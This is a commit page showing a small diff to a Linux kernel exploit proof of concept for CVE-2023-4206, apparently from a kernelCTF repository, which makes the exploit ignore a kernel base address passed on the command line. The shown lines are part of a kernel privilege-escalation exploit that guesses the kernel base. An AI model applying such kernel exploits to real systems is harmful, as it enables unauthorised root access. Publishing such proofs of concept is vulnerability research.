CVE-2023-4206_lts_cos_mitigation_2: Ignore command line kernel base in mitigation exploit

4ab48b3f1ded2472 · 4ab48b3f1ded2472 · commit 2a00fc07f196 · 2025-01-19T21:05:20.000+01:00
diff --git a/pocs/linux/kernelctf/CVE-2023-4206_lts_cos_mitigation_2/exploit/mitigation-6.1/exploit.c b/pocs/linux/kernelctf/CVE-2023-4206_lts_cos_mitigation_2/exploit/mitigation-6.1/exploit.c
@@ -922,7 +922,8 @@ void prepare_fake_qdisc(char *buf)
 
 int main(int argc, char **argv)
 {
-        if (argc > 1 && (argv[1][0] == 'f' || argv[1][0] == '0')) {
+// Ignore kernel base provided in the command line to work around a repro system issue
+        if (0 && argc > 1 && (argv[1][0] == 'f' || argv[1][0] == '0')) {
                 g_kernel_text = strtoull(argv[1], NULL, 16);
         } else {
                 printf("Using default kernel base, your chance is 1/512, good luck!\nTry providing leaked kernel base as argv[1]\n");

Original file line number	Diff line number	Diff line change
`@@ -922,7 +922,8 @@ void prepare_fake_qdisc(char *buf)`
`922`	`922`
`923`	`923`	`int main(int argc, char **argv)`
`924`	`924`	`{`
`925`		`- if (argc > 1 && (argv[1][0] == 'f' \|\| argv[1][0] == '0')) {`
	`925`	`+// Ignore kernel base provided in the command line to work around a repro system issue`
	`926`	`+ if (0 && argc > 1 && (argv[1][0] == 'f' \|\| argv[1][0] == '0')) {`
`926`	`927`	`g_kernel_text = strtoull(argv[1], NULL, 16);`
`927`	`928`	`} else {`
`928`	`929`	`printf("Using default kernel base, your chance is 1/512, good luck!\nTry providing leaked kernel base as argv[1]\n");`